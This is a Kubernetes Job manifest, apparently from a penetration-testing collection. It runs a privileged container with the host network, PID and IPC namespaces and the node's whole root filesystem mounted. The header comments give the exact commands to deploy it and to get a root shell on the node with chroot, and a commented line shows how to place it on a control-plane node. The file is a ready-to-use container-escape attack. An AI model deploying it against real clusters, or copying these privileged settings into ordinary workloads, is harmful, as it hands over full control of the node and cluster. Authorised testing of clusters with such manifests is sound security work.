###########################################################
## Deploy:   kubectl apply -f everything-allowed-exec-job.yaml
## Find Pod: kubectl get pods | grep everything-allowed-exec-job 
## Access:   kubectl exec -it everything-allowed-exec-job-ID -- chroot /host bash
## Remove:   kubectl delete job everything-allowed-exec-job
###########################################################
apiVersion: batch/v1
kind: Job
metadata:
  name: everything-allowed-exec-job
  labels:
    app: pentest
    type: job
spec:
  template:
    spec:
      hostNetwork: true
      hostPID: true
      hostIPC: true
      containers:
      - name: everything-allowed-exec-job
        image: ubuntu
        securityContext:
          privileged: true
        volumeMounts:
        - mountPath: /host
          name: noderoot
        command: [ "/bin/sh", "-c", "--" ]
        args: [ "while true; do sleep 30; done;" ]
      #nodeName: k8s-control-plane-node # Force your pod to run on the control-plane node by uncommenting this line and changing to a control-plane node name
      volumes:
      - name: noderoot
        hostPath:
          path: /
      restartPolicy: OnFailure